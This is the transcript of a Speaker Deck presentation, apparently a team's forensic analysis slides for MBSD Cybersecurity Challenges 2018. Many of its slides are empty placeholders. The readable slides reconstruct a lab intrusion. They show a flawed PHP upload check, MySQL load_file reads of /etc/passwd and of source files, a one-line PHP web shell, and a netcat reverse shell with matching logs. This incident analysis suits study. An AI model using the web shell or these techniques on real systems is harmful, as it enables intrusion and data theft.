Upgrade to Pro — share decks privately, control downloads, hide ads and more …

MBSD Cybersecurity Challenges 2018 最終審査会 発表スライド

4357acd0098b7bd5495c9048d90c811a?s=47 8ayac
December 12, 2018

MBSD Cybersecurity Challenges 2018 最終審査会 発表スライド

チームIPFactoryとして発表したもの

4357acd0098b7bd5495c9048d90c811a?s=128

8ayac

December 12, 2018
Tweet

Transcript

  1. MBSD Cybersecurity Challenges 2018

  2. None
  3. None
  4. ▋ ▋ ▋ ▋ ▋ ▋

  5. ▋ ▋ ▋ ▋ ▋ ▋ ▋ ▋ ▋ ▋

    ▋ ▋ ▋
  6. ▋ ▋ ► ► ► ►

  7. ▋ ► ► ► ► ▋ ► ► ►

  8. None
  9. None
  10. sendmessage.php ▋ ▋ ▋ $prefix = md5(time() . $user->id); $tname

    = $prefix . basename($_FILES["file"]["name"]); if (move_uploaded_file($_FILES['file']['tmp_name'], "./tmp/".$tname) && preg_match("/^[^.]+¥.jpg$/",$tname)) {
  11. sendmessage.php (2018/9/21 14:46:48) 180921 14:39:24 26247 Connect root@192.168.11.204 on mysql

    180921 14:41:06 26247 Query select load_file('/etc/hosts') 180921 14:41:12 26247 Query select load_file('/etc/passwd') 180921 14:42:30 26247 Query select load_file('/etc/issue') 180921 14:42:45 26247 Query select load_file('/etc/httpd/conf/httpd.conf') 180921 14:43:32 26247 Query select load_file('/var/www/html/webmix3/index.php') 180921 14:44:30 26247 Query select load_file('/var/www/html/webmix3/login.php') 180921 14:44:54 26247 Query select load_file('/var/www/html/webmix3/libs.php') 180921 14:45:25 26247 Query select load_file('/var/www/html/webmix3/class/class.php') 180921 14:45:45 26247 Query select load_file('/var/www/html/webmix3/class/User.php') 180921 14:46:48 26247 Query select load_file('/var/www/html/webmix3/sendmessage.php')
  12. Web Shell (2018/9/21 15:12:46) 192.168.11.2 </> </>

  13. Web Shell (2018/9/21 15:12:46) 192.168.11.2 </> </> 7449f92ea0f26445e89ae968227efaabtest.php <?php system($_POST['cmd’]);

  14. Web Shell (2018/9/21 15:12:46) 192.168.11.2 </> </> 7449f92ea0f26445e89ae968227efaabtest.php <?php system($_POST['cmd’]);

    [Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Notice: Undefined index: cmd in /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1 [Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Warning: system(): Cannot execute a blank command in /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1
  15. Web Shell (2018/9/21 15:12:46) 192.168.11.2 </> </> 7449f92ea0f26445e89ae968227efaabtest.php <?php system($_POST['cmd’]);

    192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
  16. Web Shell (2018/9/21 15:12:46) 192.168.11.2 </> </> 7449f92ea0f26445e89ae968227efaabtest.php <?php system($_POST['cmd’]);

    192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0" 192.168.11.204 - - [21/Sep/2018:15:12:46 +0900] "POST /sendmessage.php HTTP/1.1" 200 1783 "http://192.168.11.2/sendmessage.php" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
  17. (2018/9/21 15:29:02) $ nc –lvp 4444 192.168.11.2 </>

  18. (2018/9/21 15:29:02) 192.168.11.2 </> 4444/TCPで待受中…

  19. (2018/9/21 15:29:02) 192.168.11.2 </> 4444/TCPで待受中…

  20. (2018/9/21 15:29:02) 192.168.11.2 </> $ nc -lvp 4444 Listening on

    [0.0.0.0] (family 0, port 4444) Connection from 192.168.11.204 64495 received! sh-4.1$
  21. (2018/9/21 15:29:02) 192.168.11.2 </> $ nc -lvp 4444 Listening on

    [0.0.0.0] (family 0, port 4444) Connection from 192.168.11.204 64495 received! sh-4.1$ 192.168.11.204 - - [21/Sep/2018:15:29:02 +0900] "POST /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" 192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
  22. None
  23. ▋ ▋ ▋

  24. ▋ ▋ ▋ POST

  25. ▋ ▋ ▋ POST POST

  26. ( ) ▋ ► ►

  27. POST ▋ ► ►

  28. None
  29. 38

  30. ▋ ▋ ▋ ▋ ▋ ▋ ▋

  31. ▋ ▋ ▋ ▋ ▋ ▋ ▋

  32. ▋ ► ▋ ► ▋ ►

  33. ▋ ▋

  34. ▋ ► ► ►

  35. None